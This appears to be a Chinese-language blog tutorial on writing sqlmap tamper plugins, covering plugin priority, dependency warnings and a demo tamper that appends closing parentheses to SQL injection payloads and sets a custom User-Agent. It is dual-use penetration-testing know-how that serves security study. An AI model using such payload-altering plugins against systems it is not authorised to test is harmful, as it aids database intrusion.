sqlmap_tamper
–tamper [插件名]
sqlmap/tamper 插件目录
sqlmap脚本模块的用法
CONCAT_WS 和concat()一样,将多个字符串连接成一个字符串
JSON_ARRAYAGG()
函数将指定的列或者表达式的值聚合为一个 JSON 数组
1
2
3
4
5
6
|
mysql> select JSON_ARRAYAGG(name) from user;
+------------------------------------------------------------+
| JSON_ARRAYAGG(name) |
+------------------------------------------------------------+
| ["main1o", "main1o", "main1o", "main1o", "main1o", "demo"] |
+------------------------------------------------------------+
|
sqlmap\tamper
有非常灵活且自定义高的插件 Demo:
1
2
3
4
5
6
7
8
9
10
11
|
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
return payload
|
插件结构分为3部分:
PRIORITY
定义tamper的优先级 ,对应的数字越高优先级也就越大
1
|
__priority__ = PRIORITY.LOW
|
定义优先级的类 sqlmap\lib\core\enums.py
1
2
3
4
5
6
7
|
LOWEST = -100
LOWER = -50
LOW = -10
NORMAL = 0
HIGH = 10
HIGHER = 50
HIGHEST = 100
|
插件提示
1
2
|
def dependencies():
singleTimeWarnMessage(f"插件{os.path.basename(__file__)}只针对{DBMS.MYSQL}")
|
参考 sqlmap\lib\core\enums.py
tamper
核心函数,处理payload 和请求头 需要实现的功能都在这里
- payload 为sqlmap注入原始语句
- kwargs 则是处理请求头
处理多个括号 Demo
虽然sqlmap默认注入会自动闭合多个括号的参数,但是这里还是想写一下…..
测试的php代码:
把原始注入的payload加上5个右括号用来闭合:
1
2
3
4
5
6
7
|
def tamper(payload, **kwargs):
dicts = payload.split(' ',1)
dicts[0] = dicts[0] + ')))))'
payload = ' '.join(dicts)
print(payload) # 打印查看
return payload
|
注入sql语句加上了5个右括号
![image-20230518091941997](/p/sqlmap_tamper/image-20230518091941997.png)
请求头
获取字典,添加元素,burp抓包查看
1
2
3
|
def tamper(payload, **kwargs):
headers = kwargs.get('headers')
headers['User-Agent'] = 'main1o'
|
完整代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
import os
import random
import string
from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
singleTimeWarnMessage(f"插件{os.path.basename(__file__)}只针对{DBMS.MYSQL}")
def tamper(payload, **kwargs):
headers = kwargs.get('headers')
headers['User-Agent'] = 'main1o'
dicts = payload.split(' ',1)
dicts[0] = dicts[0] + ')))))'
payload = ' '.join(dicts)
return payload
|